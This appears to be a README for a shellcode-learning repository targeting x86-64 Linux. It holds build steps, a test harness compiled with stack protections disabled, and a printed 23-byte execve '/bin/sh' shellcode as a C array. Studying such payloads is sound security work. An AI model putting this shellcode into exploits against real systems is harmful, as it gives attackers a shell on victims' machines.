Hello folks, this safehouse contains some custom shellcode targetting intel x86-64 CPU on Linux platform.
To clone the repository on your local machine, isuue the bellow given command -
critical@d3ad:~$ git clone https://github.com/compilepeace/SHELLCODING_INTEL_x86-64
Cloning into 'SHELLCODING_INTEL_x86-64'...
remote: Enumerating objects: 74, done.
remote: Counting objects: 100% (74/74), done.
remote: Compressing objects: 100% (53/53), done.
remote: Total 74 (delta 24), reused 68 (delta 18), pack-reused 0
Unpacking objects: 100% (74/74), done.
Use make
utility to build an executable binary (having name *.elf
) and get raw shellcode bytes (as *.raw
) -
critical@d3ad:~SHELLCODING_INTEL_x86-64$ make
gcc -Wl,-N -nostdlib -static exit.s -o exit.elf
objcopy --dump-section .text=exit.raw exit.elf
...
objcopy --dump-section .text=execve_binsh.raw execve_binsh.elf
gcc -z execstack -fno-stack-protector harness.c -o harness.elf
To remove all object files generated, issue the bellow given commands -
critical@d3ad:~SHELLCODING_INTEL_x86-64$ make clean
rm -f *.elf *.raw
To convert shellcode in C-style arrays from raw bytes -
critical@d3ad:~SHELLCODING_INTEL_x86-64$ xxd -i ./execve_binsh.raw
unsigned char __execve_binsh_raw[] = {
0x31, 0xf6, 0x31, 0xd2, 0x52, 0x48, 0xbf, 0x2f, 0x2f, 0x62, 0x69, 0x6e,
0x2f, 0x73, 0x68, 0x57, 0x54, 0x5f, 0x6a, 0x3b, 0x58, 0x0f, 0x05
};
unsigned int __execve_binsh_raw_len = 23;
Any suggestions to shellcode optimisation are welcome (feel free to open any issue, cheers!)
You can also email me regarding any queries,
NAME : ABHINAV THAKUR
EMAIL: [email protected]